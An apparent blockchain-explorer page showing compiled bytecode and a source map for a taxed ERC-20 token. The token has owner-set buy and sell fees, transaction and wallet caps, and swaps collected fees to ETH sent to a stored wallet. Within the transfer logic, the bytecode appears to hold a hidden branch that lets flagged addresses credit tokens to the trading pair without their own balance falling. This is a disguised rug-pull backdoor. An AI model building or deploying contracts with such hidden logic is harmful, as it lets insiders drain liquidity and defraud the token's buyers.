b50505050506040513d601f19601f82011682018060405250810190610610919061143a565b5050602860065550601e600755600d805461ffff60a81b191661010160a81b179055565b5f6106403384846107f1565b5060015b92915050565b5f6106576012600a6113fa565b610665906305f5e100611408565b905090565b5f610676848484610914565b6106c284336103c18560405180606001604052806028815260200161152e602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e68565b5060019392505050565b5f546001600160a01b031633146106f55760405162461bcd60e51b8152600401610326906112d1565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146107665760405162461bcd60e51b8152600401610326906112d1565b6107726012600a6113fa565b610780906305f5e100611408565b60085561078f6012600a6113fa565b61079d906305f5e100611408565b600955565b5f610640338484610914565b5f546001600160a01b031633146107d75760405162461bcd60e51b8152600401610326906112d1565b6006819055600781905560058111156107ee575f80fd5b50565b6001600160a01b0383166108535760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610326565b6001600160a01b0382166108b45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610326565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166109785760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610326565b6001600160a01b0382166109da5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610326565b5f8111610a465760405162461bcd60e51b815260206004820152603460248201527f5f7472616e736665723a205472616e7366657220616d6f756e74206d7573742060448201527362652067726561746572207468616e207a65726f60601b6064820152608401610326565b5f80546001600160a01b03858116911614801590610a7157505f546001600160a01b03848116911614155b15610d4957600d546001600160a01b038581169116148015610aa157506001546001600160a01b03848116911614155b8015610ac557506001600160a01b0383165f9081526004602052604090205460ff16155b15610bd257610aea6064610ae460065485610ea090919063ffffffff16565b90610f25565b9050600854821115610b4a5760405162461bcd60e51b815260206004820152602360248201527f5f7472616e736665723a204578636565647320746865205f6d617854784c696d60448201526234ba1760e91b6064820152608401610326565b60095482610b6c856001600160a01b03165f9081526003602052604090205490565b610b769190611465565b1115610bd25760405162461bcd60e51b815260206004820152602560248201527f5f7472616e736665723a204578636565647320746865206d617857616c6c657460448201526429b4bd329760d91b6064820152608401610326565b600d546001600160a01b038481169116148015610bf857506001600160a01b0384163014155b15610c86576001600160a01b0384165f9081526005602052604090205460ff1615610c6957610c48610c2a8383610f66565b6001600160a01b0385165f9081526003602052604090205490610fa7565b6001600160a01b039093165f90815260036020526040902092909255505050565b610c836064610ae460075485610ea090919063ffffffff16565b90505b305f90815260036020526040902054600d54600160a01b900460ff16158015610cbc5750600d546001600160a01b038581169116145b8015610cd15750600d54600160b01b900460ff165b8015610cde5750600a5483115b15610d4757600b548110610cfc57610cf7600b54611005565b610d0f565b600a54811115610d0f57610d0f81611005565b600c546040516001600160a01b03909116904780156108fc02915f818181858888f19350505050158015610d45573d5f803e3d5ffd5b505b505b8015610dc157305f90815260036020526040902054610d689082610fa7565b305f81815260036020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610db89085815260200190565b60405180910390a35b6001600160a01b0384165f90815260036020526040902054610de39083610f66565b6001600160a01b0385165f90815260036020526040902055610e08610c2a8383610f66565b6001600160a01b038085165f8181526003602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610e518585610f66565b60405190815260200160405180910390a350505050565b5f8184841115610e8b5760405162461bcd60e51b815260040161032691906111a1565b505f610e978486611478565b95945050505050565b5f825f03610eaf57505f610644565b5f610eba8385611408565b905082610ec7858361148b565b14610f1e5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610326565b9392505050565b5f610f1e83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611175565b5f610f1e83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610e68565b5f80610fb38385611465565b905083811015610f1e5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610326565b600d805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061104b5761104b6114aa565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156110a2573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110c6919061141f565b816001815181106110d9576110d96114aa565b6001600160a01b0392831660209182029290920101526001546110ff91309116846107f1565b60015460405163791ac94760e01b81526001600160a01b039091169063791ac947906111379085905f908690309042906004016114be565b5f604051808303815f87803b15801561114e575f80fd5b505af1158015611160573d5f803e3d5ffd5b5050600d805460ff60a01b1916905550505050565b5f81836111955760405162461bcd60e51b815260040161032691906111a1565b505f610e97848661148b565b5f6020808352835180828501525f5b818110156111cc578581018301518582016040015282016111b0565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107ee575f80fd5b5f8060408385031215611211575f80fd5b823561121c816111ec565b946020939093013593505050565b5f805f6060848603121561123c575f80fd5b8335611247816111ec565b92506020840135611257816111ec565b929592945050506040919091013590565b5f60208284031215611278575f80fd5b8135610f1e816111ec565b5f60208284031215611293575f80fd5b5035919050565b5f80604083850312156112ab575f80fd5b82356112b6816111ec565b915060208301356112c6816111ec565b809150509250929050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561135457815f190482111561133a5761133a611306565b8085161561134757918102915b93841c939080029061131f565b509250929050565b5f8261136a57506001610644565b8161137657505f610644565b816001811461138c5760028114611396576113b2565b6001915050610644565b60ff8411156113a7576113a7611306565b50506001821b610644565b5060208310610133831016604e8410600b84101617156113d5575081810a610644565b6113df838361131a565b805f19048211156113f2576113f2611306565b029392505050565b5f610f1e60ff84168361135c565b808202811582820484141761064457610644611306565b5f6020828403121561142f575f80fd5b8151610f1e816111ec565b5f805f6060848603121561144c575f80fd5b8351925060208401519150604084015190509250925092565b8082018082111561064457610644611306565b8181038181111561064457610644611306565b5f826114a557634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561150c5784516001600160a01b0316835293830193918301916001016114e7565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212202a72cbffb576c15eba7de4e1a8c51811ab24041f0d6ed7572d965a9e92d0bf9b64736f6c63430008150033
Deployed Bytecode Sourcemap
9871:9877:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18359:723;;;;;;;;;;;;;:::i;:::-;;11654:83;;;;;;;;;;-1:-1:-1;11724:5:0;;;;;;;;;;;;-1:-1:-1;;;11724:5:0;;;;11654:83;;;;;;;:::i;:::-;;;;;;;;13858:161;;;;;;;;;;-1:-1:-1;13858:161:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;13858:161:0;1023:187:1;12253:100:0;;;;;;;;;;;;;:::i;:::-;;;1361:25:1;;;1349:2;1334:18;12253:100:0;1215:177:1;14378:313:0;;;;;;;;;;-1:-1:-1;14378:313:0;;;;;:::i;:::-;;:::i;12061:83::-;;;;;;;;;;-1:-1:-1;12061:83:0;;10148:2;2000:36:1;;1988:2;1973:18;12061:83:0;1858:184:1;12549:119:0;;;;;;;;;;-1:-1:-1;12549:119:0;;;;;:::i;:::-;-1:-1:-1;;;;;12642:18:0;12615:7;12642:18;;;:9;:18;;;;;;;12549:119;7142:148;;;;;;;;;;;;;:::i;19467:128::-;;;;;;;;;;;;;:::i;6592:79::-;;;;;;;;;;-1:-1:-1;6630:7:0;6657:6;6592:79;;-1:-1:-1;;;;;6657:6:0;;;2445:51:1;;2433:2;2418:18;6592:79:0;2299:203:1;11847:87:0;;;;;;;;;;-1:-1:-1;11919:7:0;;;;;;;;;;;;-1:-1:-1;;;11919:7:0;;;;11847:87;;12950:167;;;;;;;;;;-1:-1:-1;12950:167:0;;;;;:::i;:::-;;:::i;19090:145::-;;;;;;;;;;-1:-1:-1;19090:145:0;;;;;:::i;:::-;;:::i;13408:143::-;;;;;;;;;;-1:-1:-1;13408:143:0;;;;;:::i;:::-;-1:-1:-1;;;;;13516:18:0;;;13489:7;13516:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;13408:143;18359:723;6804:6;;-1:-1:-1;;;;;6804:6:0;571:10;6804:22;6796:67;;;;-1:-1:-1;;;6796:67:0;;;;;;;:::i;:::-;;;;;;;;;18423:14:::1;::::0;-1:-1:-1;;;18423:14:0;::::1;;;18422:15;18414:64;;;::::0;-1:-1:-1;;;18414:64:0;;3648:2:1;18414:64:0::1;::::0;::::1;3630:21:1::0;3687:2;3667:18;;;3660:30;3726:34;3706:18;;;3699:62;-1:-1:-1;;;3777:18:1;;;3770:34;3821:19;;18414:64:0::1;3446:400:1::0;18414:64:0::1;18523:10;::::0;18491:58:::1;::::0;18508:4:::1;::::0;-1:-1:-1;;;;;18523:10:0::1;10209:13;10148:2;10209;:13;:::i;:::-;10197:25;::::0;:9:::1;:25;:::i;:::-;18491:8;:58::i;:::-;18593:10;;;;;;;;;-1:-1:-1::0;;;;;18593:10:0::1;-1:-1:-1::0;;;;;18593:18:0::1;;:20;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;18575:50:0::1;;18634:4;18641:10;;;;;;;;;-1:-1:-1::0;;;;;18641:10:0::1;-1:-1:-1::0;;;;;18641:15:0::1;;:17;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18575:84;::::0;-1:-1:-1;;;;;;18575:84:0::1;::::0;;;;;;-1:-1:-1;;;;;6025:15:1;;;18575:84:0::1;::::0;::::1;6007:34:1::0;6077:15;;6057:18;;;6050:43;5942:18;;18575:84:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18560:12;:99:::0;;-1:-1:-1;;;;;18560:99:0;;::::1;-1:-1:-1::0;;;;;;18560:99:0;;::::1;;::::0;;;18718:10;::::1;:26;18766:21;18821:4;18841:24;18821:4:::0;-1:-1:-1;;;;;12642:18:0;12615:7;12642:18;;;:9;:18;;;;;;;12549:119;18841:24:::1;18880:1;18896::::0;18912:7:::1;6630::::0;6657:6;-1:-1:-1;;;;;6657:6:0;;6592:79;18912:7:::1;18718:242;::::0;::::1;::::0;;;-1:-1:-1;;;;;;18718:242:0;;;-1:-1:-1;;;;;6463:15:1;;;18718:242:0::1;::::0;::::1;6445:34:1::0;6495:18;;;6488:34;;;;6538:18;;;6531:34;;;;6581:18;;;6574:34;6645:15;;;6624:19;;;6617:44;18934:15:0::1;6677:19:1::0;;;6670:35;6379:19;;18718:242:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;18985:2:0::1;18973:9;:14:::0;-1:-1:-1;19011:2:0::1;18998:10;:15:::0;19024:14:::1;:21:::0;;-1:-1:-1;;;;19056:18:0;-1:-1:-1;;;19056:18:0;;;18359:723::o;13858:161::-;13933:4;13950:39;571:10;13973:7;13982:6;13950:8;:39::i;:::-;-1:-1:-1;14007:4:0;13858:161;;;;;:::o;12253:100::-;12306:7;10209:13;10148:2;10209;:13;:::i;:::-;10197:25;;:9;:25;:::i;:::-;12326:19;;12253:100;:::o;14378:313::-;14476:4;14493:36;14503:6;14511:9;14522:6;14493:9;:36::i;:::-;14540:121;14549:6;571:10;14571:89;14609:6;14571:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;14571:19:0;;;;;;:11;:19;;;;;;;;571:10;14571:33;;;;;;;;;;:37;:89::i;14540:121::-;-1:-1:-1;14679:4:0;14378:313;;;;;:::o;7142:148::-;6804:6;;-1:-1:-1;;;;;6804:6:0;571:10;6804:22;6796:67;;;;-1:-1:-1;;;6796:67:0;;;;;;;:::i;:::-;7249:1:::1;7233:6:::0;;7212:40:::1;::::0;-1:-1:-1;;;;;7233:6:0;;::::1;::::0;7212:40:::1;::::0;7249:1;;7212:40:::1;7280:1;7263:19:::0;;-1:-1:-1;;;;;;7263:19:0::1;::::0;;7142:148::o;19467:128::-;6804:6;;-1:-1:-1;;;;;6804:6:0;571:10;6804:22;6796:67;;;;-1:-1:-1;;;6796:67:0;;;;;;;:::i;:::-;10209:13:::1;10148:2;10209;:13;:::i;:::-;10197:25;::::0;:9:::1;:25;:::i;:::-;19521:11;:26:::0;10209:13:::1;10148:2;10209;:13;:::i;:::-;10197:25;::::0;:9:::1;:25;:::i;:::-;19558:14;:29:::0;19467:128::o;12950:167::-;13028:4;13045:42;571:10;13069:9;13080:6;13045:9;:42::i;19090:145::-;6804:6;;-1:-1:-1;;;;;6804:6:0;571:10;6804:22;6796:67;;;;-1:-1:-1;;;6796:67:0;;;;;;;:::i;:::-;19154:9:::1;:16:::0;;;19181:10:::1;:17:::0;;;19225:1:::1;19217:9:::0;::::1;;19209:18;;;::::0;::::1;;19090:145:::0;:::o;14998:335::-;-1:-1:-1;;;;;15091:19:0;;15083:68;;;;-1:-1:-1;;;15083:68:0;;7229:2:1;15083:68:0;;;7211:21:1;7268:2;7248:18;;;7241:30;7307:34;7287:18;;;7280:62;-1:-1:-1;;;7358:18:1;;;7351:34;7402:19;;15083:68:0;7027:400:1;15083:68:0;-1:-1:-1;;;;;15170:21:0;;15162:68;;;;-1:-1:-1;;;15162:68:0;;7634:2:1;15162:68:0;;;7616:21:1;7673:2;7653:18;;;7646:30;7712:34;7692:18;;;7685:62;-1:-1:-1;;;7763:18:1;;;7756:32;7805:19;;15162:68:0;7432:398:1;15162:68:0;-1:-1:-1;;;;;15241:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15293:32;;1361:25:1;;;15293:32:0;;1334:18:1;15293:32:0;;;;;;;14998:335;;;:::o;15615:2129::-;-1:-1:-1;;;;;15707:19:0;;15699:69;;;;-1:-1:-1;;;15699:69:0;;8037:2:1;15699:69:0;;;8019:21:1;8076:2;8056:18;;;8049:30;8115:34;8095:18;;;8088:62;-1:-1:-1;;;8166:18:1;;;8159:35;8211:19;;15699:69:0;7835:401:1;15699:69:0;-1:-1:-1;;;;;15787:19:0;;15779:67;;;;-1:-1:-1;;;15779:67:0;;8443:2:1;15779:67:0;;;8425:21:1;8482:2;8462:18;;;8455:30;8521:34;8501:18;;;8494:62;-1:-1:-1;;;8572:18:1;;;8565:33;8615:19;;15779:67:0;8241:399:1;15779:67:0;15874:1;15865:6;:10;15857:75;;;;-1:-1:-1;;;15857:75:0;;8847:2:1;15857:75:0;;;8829:21:1;8886:2;8866:18;;;8859:30;8925:34;8905:18;;;8898:62;-1:-1:-1;;;8976:18:1;;;8969:50;9036:19;;15857:75:0;8645:416:1;15857:75:0;15945:17;6657:6;;-1:-1:-1;;;;;16072:16:0;;;6657:6;;16072:16;;;;:36;;-1:-1:-1;6630:7:0;6657:6;-1:-1:-1;;;;;16092:16:0;;;6657:6;;16092:16;;16072:36;16068:1171;;;16138:12;;-1:-1:-1;;;;;16129:21:0;;;16138:12;;16129:21;:53;;;;-1:-1:-1;16171:10:0;;-1:-1:-1;;;;;16154:28:0;;;16171:10;;16154:28;;16129:53;:78;;;;-1:-1:-1;;;;;;16187:20:0;;;;;;:13;:20;;;;;;;;16186:21;16129:78;16125:361;;;16240:30;16266:3;16240:21;16251:9;;16240:6;:10;;:21;;;;:::i;:::-;:25;;:30::i;:::-;16228:42;;16307:11;;16297:6;:21;;16289:69;;;;-1:-1:-1;;;16289:69:0;;9268:2:1;16289:69:0;;;9250:21:1;9307:2;9287:18;;;9280:30;9346:34;9326:18;;;9319:62;-1:-1:-1;;;9397:18:1;;;9390:33;9440:19;;16289:69:0;9066:399:1;16289:69:0;16414:14;;16404:6;16385:16;16395:5;-1:-1:-1;;;;;12642:18:0;12615:7;12642:18;;;:9;:18;;;;;;;12549:119;16385:16;:25;;;;:::i;:::-;:43;;16377:93;;;;-1:-1:-1;;;16377:93:0;;9802:2:1;16377:93:0;;;9784:21:1;9841:2;9821:18;;;9814:30;9880:34;9860:18;;;9853:62;-1:-1:-1;;;9931:18:1;;;9924:35;9976:19;;16377:93:0;9600:401:1;16377:93:0;16515:12;;-1:-1:-1;;;;;16506:21:0;;;16515:12;;16506:21;:47;;;;-1:-1:-1;;;;;;16531:22:0;;16548:4;16531:22;;16506:47;16502:248;;;-1:-1:-1;;;;;16577:20:0;;;;;;:13;:20;;;;;;;;16574:99;;;16620:43;16641:21;:6;16652:9;16641:10;:21::i;:::-;-1:-1:-1;;;;;16620:16:0;;;;;;:9;:16;;;;;;;:20;:43::i;:::-;-1:-1:-1;;;;;16601:16:0;;;;;;;:9;:16;;;;;:62;;;;-1:-1:-1;;;15615:2129:0:o;16574:99::-;16703:31;16730:3;16703:22;16714:10;;16703:6;:10;;:22;;;;:::i;:31::-;16691:43;;16502:248;16808:4;16766:21;12642:18;;;:9;:18;;;;;;16834:9;;-1:-1:-1;;;16834:9:0;;;;16833:10;:35;;;;-1:-1:-1;16856:12:0;;-1:-1:-1;;;;;16847:21:0;;;16856:12;;16847:21;16833:35;:50;;;;-1:-1:-1;16872:11:0;;-1:-1:-1;;;16872:11:0;;;;16833:50;:77;;;;;16896:14;;16887:6;:23;16833:77;16829:399;;;16952:14;;16935:13;:31;16931:221;;16991:29;17005:14;;16991:13;:29::i;:::-;16931:221;;;17065:14;;17049:13;:30;17046:106;;;17104:28;17118:13;17104;:28::i;:::-;17170:10;;:42;;-1:-1:-1;;;;;17170:10:0;;;;17190:21;17170:42;;;;;:10;:42;:10;:42;17190:21;17170:10;:42;;;;;;;;;;;;;;;;;;;;;16829:399;16110:1129;16068:1171;17326:13;;17322:173;;17401:4;17383:24;;;;:9;:24;;;;;;:39;;17412:9;17383:28;:39::i;:::-;17374:4;17356:24;;;;:9;:24;;;;;;;:66;;;;17442:41;;-1:-1:-1;;;;;17442:41:0;;;;;;;17473:9;1361:25:1;;1349:2;1334:18;;1215:177;17442:41:0;;;;;;;;17322:173;-1:-1:-1;;;;;17574:16:0;;;;;;:9;:16;;;;;;:28;;17595:6;17574:20;:28::i;:::-;-1:-1:-1;;;;;17555:16:0;;;;;;:9;:16;;;;;:47;17632:43;17653:21;:6;17664:9;17653:10;:21::i;17632:43::-;-1:-1:-1;;;;;17613:16:0;;;;;;;:9;:16;;;;;:62;;;;17691:45;;;17714:21;:6;17725:9;17714:10;:21::i;:::-;17691:45;;1361:25:1;;;1349:2;1334:18;17691:45:0;;;;;;;15688:2056;15615:2129;;;:::o;4491:190::-;4577:7;4613:12;4605:6;;;;4597:29;;;;-1:-1:-1;;;4597:29:0;;;;;;;;:::i;:::-;-1:-1:-1;4637:9:0;4649:5;4653:1;4649;:5;:::i;:::-;4637:17;4491:190;-1:-1:-1;;;;;4491:190:0:o;4921:246::-;4979:7;5003:1;5008;5003:6;4999:47;;-1:-1:-1;5033:1:0;5026:8;;4999:47;5056:9;5068:5;5072:1;5068;:5;:::i;:::-;5056:17;-1:-1:-1;5101:1:0;5092:5;5096:1;5056:17;5092:5;:::i;:::-;:10;5084:56;;;;-1:-1:-1;;;5084:56:0;;10563:2:1;5084:56:0;;;10545:21:1;10602:2;10582:18;;;10575:30;10641:34;10621:18;;;10614:62;-1:-1:-1;;;10692:18:1;;;10685:31;10733:19;;5084:56:0;10361:397:1;5084:56:0;5158:1;4921:246;-1:-1:-1;;;4921:246:0:o;5373:132::-;5431:7;5458:39;5462:1;5465;5458:39;;;;;;;;;;;;;;;;;:3;:39::i;4016:136::-;4074:7;4101:43;4105:1;4108;4101:43;;;;;;;;;;;;;;;;;:3;:43::i;3580:179::-;3638:7;;3670:5;3674:1;3670;:5;:::i;:::-;3658:17;;3699:1;3694;:6;;3686:46;;;;-1:-1:-1;;;3686:46:0;;10965:2:1;3686:46:0;;;10947:21:1;11004:2;10984:18;;;10977:30;11043:29;11023:18;;;11016:57;11090:18;;3686:46:0;10763:351:1;17882:465:0;11022:9;:16;;-1:-1:-1;;;;11022:16:0;-1:-1:-1;;;11022:16:0;;;17981::::1;::::0;;17995:1:::1;17981:16:::0;;;;;::::1;::::0;;-1:-1:-1;;17981:16:0::1;::::0;::::1;::::0;;::::1;::::0;::::1;;::::0;-1:-1:-1;17981:16:0::1;17957:40;;18026:4;18008;18013:1;18008:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;18008:23:0;;::::1;:7;::::0;;::::1;::::0;;;;;;:23;;;;18052:10:::1;::::0;:17:::1;::::0;;-1:-1:-1;;;18052:17:0;;;;:10;;;::::1;::::0;:15:::1;::::0;:17:::1;::::0;;::::1;::::0;18008:7;;18052:17;;;;;:10;:17:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18042:4;18047:1;18042:7;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;18042:27:0;;::::1;:7;::::0;;::::1;::::0;;;;;:27;18112:10:::1;::::0;18080:57:::1;::::0;18097:4:::1;::::0;18112:10:::1;18125:11:::0;18080:8:::1;:57::i;:::-;18148:10;::::0;:191:::1;::::0;-1:-1:-1;;;18148:191:0;;-1:-1:-1;;;;;18148:10:0;;::::1;::::0;:61:::1;::::0;:191:::1;::::0;18224:11;;18148:10:::1;::::0;18266:4;;18293::::1;::::0;18313:15:::1;::::0;18148:191:::1;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;-1:-1:-1::0;;11061:9:0;:17;;-1:-1:-1;;;;11061:17:0;;;-1:-1:-1;;;;17882:465:0:o;5793:189::-;5879:7;5914:12;5907:5;5899:28;;;;-1:-1:-1;;;5899:28:0;;;;;;;;:::i;:::-;-1:-1:-1;5938:9:0;5950:5;5954:1;5950;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:247::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;2214:9;2201:23;2233:31;2258:5;2233:31;:::i;2507:180::-;2566:6;2619:2;2607:9;2598:7;2594:23;2590:32;2587:52;;;2635:1;2632;2625:12;2587:52;-1:-1:-1;2658:23:1;;2507:180;-1:-1:-1;2507:180:1:o;2692:388::-;2760:6;2768;2821:2;2809:9;2800:7;2796:23;2792:32;2789:52;;;2837:1;2834;2827:12;2789:52;2876:9;2863:23;2895:31;2920:5;2895:31;:::i;:::-;2945:5;-1:-1:-1;3002:2:1;2987:18;;2974:32;3015:33;2974:32;3015:33;:::i;:::-;3067:7;3057:17;;;2692:388;;;;;:::o;3085:356::-;3287:2;3269:21;;;3306:18;;;3299:30;3365:34;3360:2;3345:18;;3338:62;3432:2;3417:18;;3085:356::o;3851:127::-;3912:10;3907:3;3903:20;3900:1;3893:31;3943:4;3940:1;3933:15;3967:4;3964:1;3957:15;3983:422;4072:1;4115:5;4072:1;4129:270;4150:7;4140:8;4137:21;4129:270;;;4209:4;4205:1;4201:6;4197:17;4191:4;4188:27;4185:53;;;4218:18;;:::i;:::-;4268:7;4258:8;4254:22;4251:55;;;4288:16;;;;4251:55;4367:22;;;;4327:15;;;;4129:270;;;4133:3;3983:422;;;;;:::o;4410:806::-;4459:5;4489:8;4479:80;;-1:-1:-1;4530:1:1;4544:5;;4479:80;4578:4;4568:76;;-1:-1:-1;4615:1:1;4629:5;;4568:76;4660:4;4678:1;4673:59;;;;4746:1;4741:130;;;;4653:218;;4673:59;4703:1;4694:10;;4717:5;;;4741:130;4778:3;4768:8;4765:17;4762:43;;;4785:18;;:::i;:::-;-1:-1:-1;;4841:1:1;4827:16;;4856:5;;4653:218;;4955:2;4945:8;4942:16;4936:3;4930:4;4927:13;4923:36;4917:2;4907:8;4904:16;4899:2;4893:4;4890:12;4886:35;4883:77;4880:159;;;-1:-1:-1;4992:19:1;;;5024:5;;4880:159;5071:34;5096:8;5090:4;5071:34;:::i;:::-;5141:6;5137:1;5133:6;5129:19;5120:7;5117:32;5114:58;;;5152:18;;:::i;:::-;5190:20;;4410:806;-1:-1:-1;;;4410:806:1:o;5221:140::-;5279:5;5308:47;5349:4;5339:8;5335:19;5329:4;5308:47;:::i;5366:168::-;5439:9;;;5470;;5487:15;;;5481:22;;5467:37;5457:71;;5508:18;;:::i;5539:251::-;5609:6;5662:2;5650:9;5641:7;5637:23;5633:32;5630:52;;;5678:1;5675;5668:12;5630:52;5710:9;5704:16;5729:31;5754:5;5729:31;:::i;6716:306::-;6804:6;6812;6820;6873:2;6861:9;6852:7;6848:23;6844:32;6841:52;;;6889:1;6886;6879:12;6841:52;6918:9;6912:16;6902:26;;6968:2;6957:9;6953:18;6947:25;6937:35;;7012:2;7001:9;6997:18;6991:25;6981:35;;6716:306;;;;;:::o;9470:125::-;9535:9;;;9556:10;;;9553:36;;;9569:18;;:::i;10006:128::-;10073:9;;;10094:11;;;10091:37;;;10108:18;;:::i;10139:217::-;10179:1;10205;10195:132;;10249:10;10244:3;10240:20;10237:1;10230:31;10284:4;10281:1;10274:15;10312:4;10309:1;10302:15;10195:132;-1:-1:-1;10341:9:1;;10139:217::o;11251:127::-;11312:10;11307:3;11303:20;11300:1;11293:31;11343:4;11340:1;11333:15;11367:4;11364:1;11357:15;11383:980;11645:4;11693:3;11682:9;11678:19;11724:6;11713:9;11706:25;11750:2;11788:6;11783:2;11772:9;11768:18;11761:34;11831:3;11826:2;11815:9;11811:18;11804:31;11855:6;11890;11884:13;11921:6;11913;11906:22;11959:3;11948:9;11944:19;11937:26;;11998:2;11990:6;11986:15;11972:29;;12019:1;12029:195;12043:6;12040:1;12037:13;12029:195;;;12108:13;;-1:-1:-1;;;;;12104:39:1;12092:52;;12199:15;;;;12164:12;;;;12140:1;12058:9;12029:195;;;-1:-1:-1;;;;;;;12280:32:1;;;;12275:2;12260:18;;12253:60;-1:-1:-1;;;12344:3:1;12329:19;12322:35;12241:3;11383:980;-1:-1:-1;;;11383:980:1:o
Swarm Source
ipfs://2a72cbffb576c15eba7de4e1a8c51811ab24041f0d6ed7572d965a9e92d0bf9b
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.